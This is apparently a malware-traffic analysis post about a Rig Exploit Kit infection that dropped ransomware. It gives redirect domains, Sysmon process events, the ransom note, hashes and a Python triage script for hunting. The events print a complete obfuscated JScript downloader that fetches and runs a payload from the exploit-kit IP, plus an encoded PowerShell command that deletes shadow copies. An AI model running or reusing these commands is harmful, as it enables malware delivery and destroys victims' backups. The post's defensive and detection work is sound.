Rig Exploit Kit delivers Ransomware

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected", all lowercase.

PCAP file of the infection traffic:
2020-03-04-Rig-EK-Ransomware-pcap.zip


ASSOCIATED DOMAINS:

174.137.155.139 – clk.rtpdn11.com – GET /click?i=034AdDm5wWo_0 – REDIRECT
104.31.92.55 Port 443 – www.infiesta.info – REDIRECT
104.27.164.236 Port 443 – skwizyou.xyz – REDIRECT
206.189.156.214 – POST /?Mzk0MzA2&klUjFLy&TXKLZrzF=community&dnLl=accelerator&igbmuNyYP=irreverent&fLP=disagree – RIG EXPLOIT KIT


IMAGES:

Shown above: Traffic associated with Rig Exploit Kit delivering ransomware

Shown above: Ransom note left on desktop of infected host

Shown above: Sample of encrypted files from ransomware attack

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[SYSMON EVENT TYPE 1]
Image C:\Windows\System32\cmd.exe
CommandLine cmd.exe /q /c cd /d “%%tmp%%” && echo function O(l){var w=”p”+”ow”,j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+”.”+e+”Request.5.1″);y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript,o=”Object”,A=Math,a=Function(“b”,”return u.Create”+o+”(b)”);P=(“”+u).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=u.Arguments,e=”WinHTTP”,Z=”cmd”,j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=u[P+”FullName”],E=”.”+p;s.Type=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(31^<d){var z=1;x+=”dll”}else x+=p;s[“sav”+”etofile”](x,2);s.Close();f=”r”;z^&^&(x=”regsv”+f+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(x){};q.Deletefile(K);>1.tmp && start wscript //B //E:JScript 1.tmp “vcbdf45” “http://206.189.156.214/?MjM5MjQ1&RULSoTD&f2fs=w3bQMvXcJxbQFYbGMv3DSKNbNkbWHViPxomG9MildZaqZGX_k7TDfF-qoVTcCgWRxfR8e&rFtV=callous&Byt=irreverent&ySZVs=everyone&Mofsmtop=mustard&fhCG=accelerator&dfWjnzQR=electrical&dQGvo=border&UBeJoS=difference&kQssh=difference&sguGYnV=irreverent&Cfbt=callous&t4f4=7ZUOgrpjkSBfw1kydxdA1MX962njkiGnUOcgp6D9ReFMAwT-KKREbc63VrzybckLYsk9w&EQlWYjIbp=filly&hJtMjcyMTcw”
CurrentDirectory C:\Users\Jane\Desktop\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:3436 CREDAT:144385 /prefetch:2

[SYSMON EVENT TYPE 1]
Image C:\Windows\System32\wscript.exe
CommandLine wscript //B //E:JScript 1.tmp “vcbdf45” “http://206.189.156.214/?MjM5MjQ1&RULSoTD&f2fs=w3bQMvXcJxbQFYbGMv3DSKNbNkbWHViPxomG9MildZaqZGX_k7TDfF-qoVTcCgWRxfR8e&rFtV=callous&Byt=irreverent&ySZVs=everyone&Mofsmtop=mustard&fhCG=accelerator&dfWjnzQR=electrical&dQGvo=border&UBeJoS=difference&kQssh=difference&sguGYnV=irreverent&Cfbt=callous&t4f4=7ZUOgrpjkSBfw1kydxdA1MX962njkiGnUOcgp6D9ReFMAwT-KKREbc63VrzybckLYsk9w&EQlWYjIbp=filly&hJtMjcyMTcw” “¤”
CurrentDirectory C:\Users\Jane\AppData\Local\Temp\
Hashes MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cmd.exe /q /c cd /d “%tmp%” && echo function O(l){var w=”p”+”ow”,j=36;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+”.”+e+”Request.5.1″);y[“set”+”Proxy”](n);y.open(“GET”,k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e[“cha”+”rCodeAt”](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join(“”)};try{var u=WScript,o=”Object”,A=Math,a=Function(“b”,”return u.Create”+o+”(b)”);P=(“”+u).split(” “)[1],M=”indexOf”,q=a(P+”ing.FileSystem”+o),m=u.Arguments,e=”WinHTTP”,Z=”cmd”,j=a(“W”+P+”.Shell”),s=a(“ADODB.Stream”),x=O(8)+”.”,p=”exe”,n=0,K=u[P+”FullName”],E=”.”+p;s.Type=2;s.Charset=”iso-8859-1″;s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M](“PE\x00\x00″));s.WriteText(v);if(31^<d){var z=1;x+=”dll”}else x+=p;s[“sav”+”etofile”](x,2);s.Close();f=”r”;z^&^&(x=”regsv”+f+32+E+” /s “+x);j.run(Z+E+” /c “+x,0)}catch(x){};q.Deletefile(K);>1.tmp && start wscript //B //E:JScript 1.tmp “vcbdf45” “http://206.189.156.214/?MjM5MjQ1&RULSoTD&f2fs=w3bQMvXcJxbQFYbGMv3DSKNbNkbWHViPxomG9MildZaqZGX_k7TDfF-qoVTcCgWRxfR8e&rFtV=callous&Byt=irreverent&ySZVs=everyone&Mofsmtop=mustard&fhCG=accelerator&dfWjnzQR=electrical&dQGvo=border&UBeJoS=difference&kQssh=difference&sguGYnV=irreverent&Cfbt=callous&t4f4=7ZUOgrpjkSBfw1kydxdA1MX962njkiGnUOcgp6D9ReFMAwT-KKREbc63VrzybckLYsk9w&EQlWYjIbp=filly&hJtMjcyMTcw”

[SYSMON EVENT TYPE 1 – RANSOMWARE USING POWERSHELL TO DELETE SHADOWCOPY]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
CurrentDirectory C:\Users\Jane\AppData\Local\Temp\
Hashes MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7
ParentImage C:\Users\Jane\AppData\Local\Temp\rpr1l7q0.exe
ParentCommandLine “C:\Users\Jane\AppData\Local\Temp\rpr1l7q0.exe”

Decoded base64 from the PowerShell -e command line above:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
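As an added example (not part of the original post, and not a tool the post references), the following Python script shows how the three Sysmon Event ID 1 records above could be triaged automatically: a browser (iexplore.exe) spawning cmd.exe, a cmd.exe line that echoes script text into 1.tmp and immediately launches it with wscript //E:JScript, a script host handed a URL argument, a parent process running from the user's Temp directory, and a PowerShell -e argument that decodes (base64 of UTF-16LE text, which is how the plaintext above is recovered) to a shadow copy deletion. The sample records are constructed from the fields on this page with the long JScript command line abbreviated; the benign fourth record, the finding names and the browser/script-host lists are this example's own assumptions.

```python
"""Triage of Sysmon Event ID 1 (process creation) records for the chain shown above.

Sample events are constructed from the Sysmon fields on this page (the long
JScript command line is abbreviated); finding names are this example's own.
"""
import base64
import re

# Full base64 argument from the PowerShell event on this page.
ENCODED_SHADOW_DELETE = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Constructed sample records (values from the page; fourth record is a benign control).
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'cmd.exe /q /c cd /d "%tmp%" && echo function O(l){...};q.Deletefile(K);>1.tmp '
                       '&& start wscript //B //E:JScript 1.tmp "vcbdf45" "http://206.189.156.214/?MjM5MjQ1"',
        "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
    },
    {
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": 'wscript //B //E:JScript 1.tmp "vcbdf45" "http://206.189.156.214/?MjM5MjQ1"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -e " + ENCODED_SHADOW_DELETE,
        "ParentImage": r"C:\Users\Jane\AppData\Local\Temp\rpr1l7q0.exe",
    },
    {   # benign control: an operator opening PowerShell from Explorer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -NoProfile -Command Get-Date",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}   # assumed list
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
SHADOW_COPY_PATTERNS = [
    re.compile(r"win32_shadowcopy", re.I),
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
]
# Common spellings of PowerShell's -EncodedCommand switch followed by its base64 argument.
ENCODED_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """Return the plaintext of a `powershell -e <base64>` command line, or None.

    -EncodedCommand carries the script as base64 of its UTF-16LE encoding.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev):
    """Return the list of finding tags raised by one Sysmon Event ID 1 record."""
    findings = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"]
    if parent in BROWSERS and image in SCRIPT_HOSTS:
        findings.append("browser_spawned_script_host")
    # echo <text> >file && (start) wscript/cscript: script written and launched in one line
    if image == "cmd.exe" and re.search(r"\becho\b.*>\s*\S+\s*&&\s*(?:start\s+)?[wc]script", cmd, re.I):
        findings.append("script_dropped_via_echo_and_launched")
    if image in ("wscript.exe", "cscript.exe"):
        if re.search(r"//E:", cmd, re.I):          # engine override runs any extension (here .tmp) as JScript
            findings.append("script_host_engine_override")
        if re.search(r"https?://", cmd, re.I):     # payload URL passed as a script argument
            findings.append("script_host_given_url_argument")
    if "\\appdata\\local\\temp\\" in ev["ParentImage"].lower():
        findings.append("parent_running_from_user_temp")
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        findings.append("powershell_encoded_command")
        if any(p.search(decoded) for p in SHADOW_COPY_PATTERNS):
            findings.append("shadow_copy_deletion")
    return findings


def triage_all(events):
    """Triage a list of records; result index i holds the findings for events[i]."""
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for ev, found in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(f"{basename(ev['Image']):16} <- {basename(ev['ParentImage']):16} {found or 'no findings'}")
```

Run as a script it prints one line per record; the first three records each raise at least one finding and the Explorer-launched control raises none. The individual tags are deliberately narrow (engine override, URL argument, Temp-resident parent) so that a correlation rule can require two or more of them on the same host within a short window rather than alerting on any single one.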


RANSOM NOTE:

“Sorry, but your files are locked due to a critical error in your system. The extension of your files is now “fezp8n1vm”. If you yourself want to decrypt the files – you will lose them FOREVER.

You have to pay bitcoins to get your file decoder. DO NOT TAKE TIME, you have several days to pay, otherwise the cost of the decoder will double. How to do it is written below.

If you cannot do it yourself, then search the Internet for file recovery services in your country or city.

Go to the page through the browser: http://decryptor.cc/
If your site does not open, then download the TOR browser (https://torproject.org/). If you can’t access the download page of the TOR browser, then download the VPN!
After you install the TOR browser on your computer go to the site: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/”


ASSOCIATED HASH:
rpr1l7q0.exe – Payload Delivered By Rig EK
SHA-256: 5837b4ba1fd67f23fe1285f47782f17ecbebba7d9cf43cdf9b4f18dcb38ec6e7
https://www.virustotal.com/gui/file-analysis/ZDhmNmNkOTQ2OGY2MDA3MTdlNTQwZTU4ODczM2Y5ZmM6MTU4MzM3MTA2OA==/detection